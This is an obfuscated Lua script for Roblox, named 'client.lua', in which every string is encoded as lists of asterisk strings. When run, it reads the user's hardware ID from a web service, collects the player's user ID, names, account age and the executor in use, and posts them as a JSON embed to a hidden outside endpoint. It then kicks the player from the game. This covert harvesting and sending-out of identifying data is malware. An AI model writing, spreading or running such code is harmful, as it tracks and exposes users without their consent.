function NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


-- client.lua

local http_request = http_request;
if syn then
	http_request = syn.request
elseif SENTINEL_V2 then
	function http_request(tb)
		return {
			StatusCode = 200;
			Body = request(tb.Url, tb.Method, (tb.Body or NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({})))
		}
	end
end

local body = http_request({Url = NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','**********************************************','***************************************************************************************************************','******************************************************************************************************************','*******************************************************************************************************','***********************************************','*******************************************************************************************************','*****************************************************************************************************','********************************************************************************************************************'}); Method = NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'***********************************************************************','*********************************************************************','************************************************************************************'})}).Body;
local decoded = game:GetService(NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','***********************************************************************************','*****************************************************************************************************','******************************************************************************************************************','**********************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************','*****************************************************************************************************'})):JSONDecode(body)
local hwid_list = {NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'***********************************************************************************','*************************************************************************************************************************','**************************************************************************************************************','*********************************************','**********************************************************************','*********************************************************************************************************','**************************************************************************************************************','*******************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','****************************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************'}), NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*********************************************************************','************************************************************************************************************************','****************************************************************************************************************','************************************************************************************************************','***************************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','*********************************************','***********************************************************************','*********************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************'}), NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************','******************************************************************************************************************','***************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','*********************************************','*************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*********************************************','*************************************************************************','****************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************','******************************************************************************************************','*********************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************'}), NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'***********************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*****************************************************************************************************','************************************************************************************************************','*********************************************','**********************************************************************','*********************************************************************************************************','**************************************************************************************************************','*******************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','****************************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************'})};
local hwid = NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({});

for i, v in next, hwid_list do
	if decoded.headers[v] then
		hwid = decoded.headers[v];
		break
	end
end

if hwid then
	setclipboard(hwid)
	
	local ExecutorUsing = is_sirhurt_closure and NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'***********************************************************************************','*********************************************************************************************************','******************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','******************************************************************************************************************','********************************************************************************************************************'}) or pebc_execute and NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************','******************************************************************************************************************','***************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','***********************************************************************************','*************************************************************************************************************','*************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************'}) or syn and NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'***********************************************************************************','*************************************************************************************************************************','**************************************************************************************************************','*************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','********************************','****************************************************************************************'}) or secure_load and NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'***********************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*****************************************************************************************************','************************************************************************************************************'}) or KRNL_LOADED and NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'***************************************************************************','******************************************************************************************************************','**************************************************************************************************************','************************************************************************************************************'}) or SONA_LOADED and NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'***********************************************************************************','***************************************************************************************************************','**************************************************************************************************************','*************************************************************************************************'}) or NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'***********************************************************************************','********************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************','*****************************************************************************************************','************************************************************************************************************************','****************************************************************************************************************','************************************************************************************************************','***************************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************','*******************************************************************************************************'})
local HttpService = game:GetService(NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','***********************************************************************************','*****************************************************************************************************','******************************************************************************************************************','**********************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************','*****************************************************************************************************'}))
local endpoint = NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','**********************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************************','*************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','**********************************************','****************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','******************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','*************************************************************************************************************','*************************************************************************************************','**********************************************************************************************************************','*****************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*************************************************************************************************','****************************************************************************************************************','*********************************************************************************************************','***********************************************','***********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','***********************************************','**********************************************************************************************************************','*************************************************','***********************************************','****************************************************************************************************************','******************************************************************************************************************','***************************************************************************************************************','************************************************************************************************************************','*************************************************************************************************************************','***********************************************','******************************************************','************************************************','****************************************************************************************************','******************************************************','****************************************************************************************************','*********************************************************','*****************************************************************************************************','********************************************************','*********************************************','*************************************************************************************************','********************************************************','*************************************************','***************************************************************************************************','*********************************************','****************************************************','****************************************************','************************************************','*****************************************************','*********************************************','**************************************************************************************************','**************************************************','****************************************************************************************************','****************************************************************************************************','*********************************************','******************************************************','**************************************************************************************************','*************************************************************************************************','*****************************************************************************************************','****************************************************************************************************','****************************************************','**************************************************','*****************************************************','*************************************************','******************************************************','************************************************','*************************************************************************************************'})
--ilovelatinas joshga

local Data =
    {
        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*****************************************************************************************************','*************************************************************************************************************','**************************************************************************************************','*****************************************************************************************************','****************************************************************************************************','*******************************************************************************************************************'})]= {
            {            
                [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','************************************************************************************************************','*****************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*******************************************************************','************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************','***********************************************************************************************************','********************************','********************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','********************************','********************************************************************************************************************','***************************************************************************************************************','********************************','**********************************************************************************************************************','*********************************************************************************************************','*****************************************************************************************************','***********************************************************************************************************************','********************************','****************************************************************************************************************','************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*******************************************************************************************************************','********************************','****************************************************************************************************************','******************************************************************************************************************','***************************************************************************************************************','******************************************************************************************************','*********************************************************************************************************','************************************************************************************************************','*****************************************************************************************************'});
                [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*********************************************************************************************************************','******************************************************************************************************************','************************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','***********************************************************************************************************************','***********************************************************************************************************************','***********************************************************************************************************************','**********************************************','******************************************************************************************************************','***************************************************************************************************************','**************************************************************************************************','************************************************************************************************************','***************************************************************************************************************','************************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*******************************************************************************************************************','***********************************************'})..game.Players.LocalPlayer.UserId;
                [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'****************************************************************************************************','*****************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************************************','************************************************************************************************','************************************************************************************************'})..game.Players.LocalPlayer.DisplayName..NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************','****************************************'})..game.Players.LocalPlayer.Name..NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*****************************************','********************************','************************************************************************************************','************************************************************************************************','************************************************************************************************'});
                [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'***************************************************************************************************','***************************************************************************************************************','************************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************'})]= tonumber(0x7269da);
                [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*********************************************************************************************************','*************************************************************************************************************','*************************************************************************************************','*******************************************************************************************************','*****************************************************************************************************'})] = {
                [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*********************************************************************************************************************','******************************************************************************************************************','************************************************************************************************************'})] = NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','***********************************************************************************************************************','***********************************************************************************************************************','***********************************************************************************************************************','**********************************************','******************************************************************************************************************','***************************************************************************************************************','**************************************************************************************************','************************************************************************************************************','***************************************************************************************************************','************************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*************************************************************************************************','**********************************************************************************************************************','*************************************************************************************************','********************************************************************************************************************','*************************************************************************************************','******************************************************************************************************************','*********************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','*************************************************************************************************************','**************************************************************************************************','**************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','************************************************************************************************************','***********************************************','*********************************************************************************************************','*************************************************************************************************************','*************************************************************************************************','*******************************************************************************************************','*****************************************************************************************************','***************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*************************************************************************','****************************************************************************************************','*************************************************************'})..game.Players.LocalPlayer.UserId..NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'**************************************','***********************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*************************************************************','****************************************************','**************************************************','************************************************','**************************************','********************************************************************************************************','*****************************************************************************************************','*********************************************************************************************************','*******************************************************************************************************','********************************************************************************************************','********************************************************************************************************************','*************************************************************','****************************************************','**************************************************','************************************************','**************************************','******************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','*************************************************************************************************************','*************************************************************************************************','********************************************************************************************************************','*************************************************************','****************************************************************************************************************','**************************************************************************************************************','*******************************************************************************************************'})
            },
                [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'******************************************************************************************************','*********************************************************************************************************','*****************************************************************************************************','************************************************************************************************************','****************************************************************************************************','*******************************************************************************************************************'})]= {
                    {
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'**************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*********************************************************************','************************************************************************************************************************','*****************************************************************************************************','***************************************************************************************************','*********************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************'}),
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'**********************************************************************************************************************','*************************************************************************************************','************************************************************************************************************','*********************************************************************************************************************','*****************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************************************','************************************************************************************************','************************************************************************************************'})..ExecutorUsing..NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************************************','************************************************************************************************','************************************************************************************************'}),
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*********************************************************************************************************','**************************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*****************************************************************************************************'})]= true
                    },
                    {
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'**************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*****************************************************************','*******************************************************************************************************','*****************************************************************************************************'}),
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'**********************************************************************************************************************','*************************************************************************************************','************************************************************************************************************','*********************************************************************************************************************','*****************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************************************','************************************************************************************************','************************************************************************************************'})..game.Players.LocalPlayer.AccountAge..NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************************************','************************************************************************************************','************************************************************************************************'}),
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*********************************************************************************************************','**************************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*****************************************************************************************************'})]= true
                    },
                    {
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'**************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*************************************************************************','********************************************************************'}),
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'**********************************************************************************************************************','*************************************************************************************************','************************************************************************************************************','*********************************************************************************************************************','*****************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************************************','************************************************************************************************','************************************************************************************************'})..game.Players.LocalPlayer.UserId..NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************************************','************************************************************************************************','************************************************************************************************'}),
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*********************************************************************************************************','**************************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*****************************************************************************************************'})]= true
                    },
                
                {
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'**************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************************************','***********************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************'}),
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'**********************************************************************************************************************','*************************************************************************************************','************************************************************************************************************','*********************************************************************************************************************','*****************************************************************************************************'})]= NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************************************','************************************************************************************************','************************************************************************************************'})..hwid..NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'************************************************************************************************','************************************************************************************************','************************************************************************************************'}),
                        [NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*********************************************************************************************************','**************************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*****************************************************************************************************'})]= true
                    },
                }              
            }
        }
}
local Headers = {[NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*******************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*********************************************','************************************************************************************','*************************************************************************************************************************','****************************************************************************************************************','*****************************************************************************************************'})]=NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*************************************************************************************************','****************************************************************************************************************','****************************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************','*************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','***********************************************','**********************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************'})}
local Encoded = HttpService:JSONEncode(Data)

Request = http_request or request or HttpPost or syn.request
LINK = NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','**********************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************************','*************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','**********************************************','****************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','******************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','*************************************************************************************************************','*************************************************************************************************','**********************************************************************************************************************','*****************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*************************************************************************************************','****************************************************************************************************************','*********************************************************************************************************','***********************************************','***********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','***********************************************','**********************************************************************************************************************','*************************************************','***********************************************','****************************************************************************************************************','******************************************************************************************************************','***************************************************************************************************************','************************************************************************************************************************','*************************************************************************************************************************','***********************************************','******************************************************','************************************************','****************************************************************************************************','******************************************************','****************************************************************************************************','*********************************************************','*****************************************************************************************************','********************************************************','*********************************************','*************************************************************************************************','********************************************************','*************************************************','***************************************************************************************************','*********************************************','****************************************************','****************************************************','************************************************','*****************************************************','*********************************************','**************************************************************************************************','**************************************************','****************************************************************************************************','****************************************************************************************************','*********************************************','******************************************************','**************************************************************************************************','*************************************************************************************************','*****************************************************************************************************','****************************************************************************************************','****************************************************','**************************************************','*****************************************************','*************************************************','******************************************************','************************************************','*************************************************************************************************'})
local Final = {Url = NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','**********************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************************','*************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','**********************************************','****************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','******************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','*************************************************************************************************************','*************************************************************************************************','**********************************************************************************************************************','*****************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*************************************************************************************************','****************************************************************************************************************','*********************************************************************************************************','***********************************************','***********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','***********************************************','**********************************************************************************************************************','*************************************************','***********************************************','****************************************************************************************************************','******************************************************************************************************************','***************************************************************************************************************','************************************************************************************************************************','*************************************************************************************************************************','***********************************************','******************************************************','************************************************','****************************************************************************************************','******************************************************','****************************************************************************************************','*********************************************************','*****************************************************************************************************','********************************************************','*********************************************','*************************************************************************************************','********************************************************','*************************************************','***************************************************************************************************','*********************************************','****************************************************','****************************************************','************************************************','*****************************************************','*********************************************','**************************************************************************************************','**************************************************','****************************************************************************************************','****************************************************************************************************','*********************************************','******************************************************','**************************************************************************************************','*************************************************************************************************','*****************************************************************************************************','****************************************************************************************************','****************************************************','**************************************************','*****************************************************','*************************************************','******************************************************','************************************************','*************************************************************************************************'}), Body = Encoded, Method = NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************','*******************************************************************************','***********************************************************************************','************************************************************************************'}), Headers = Headers}
Request(Final)


	
	
	game:GetService(NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************','************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*******************************************************************************************************************'})).LocalPlayer:Kick(NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*****************************************************************************************','***************************************************************************************************************','*********************************************************************************************************************','********************************','*************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','********************************','**************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************************','********************************','***********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','****************************************************************************************************','********************************','**********************************************************************************************************************************************************************************************************************************','********************************************************************************************************************************************************','*************************************************************************************************************************************************','********************************','********************************************************************************','************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','********************************','***********************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************','******************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','********************************','******************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************************','*************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','**********************************************','**********************************************','**********************************************'}))
else
	game:GetService(NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'********************************************************************************','************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*******************************************************************************************************************'})).LocalPlayer:Kick(NoRsOyrhGEKxrIPUKEPrNBLBEKXxEcmCUzWntBpMYZAeRWUCLmLN({'*********************************************************************************************************************','**************************************************************************************************************','*************************************************************************************************','**************************************************************************************************','************************************************************************************************************','*****************************************************************************************************','********************************','********************************************************************************************************************','***************************************************************************************************************','********************************','******************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','****************************************************************************************************','********************************','***********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************'}))
end    
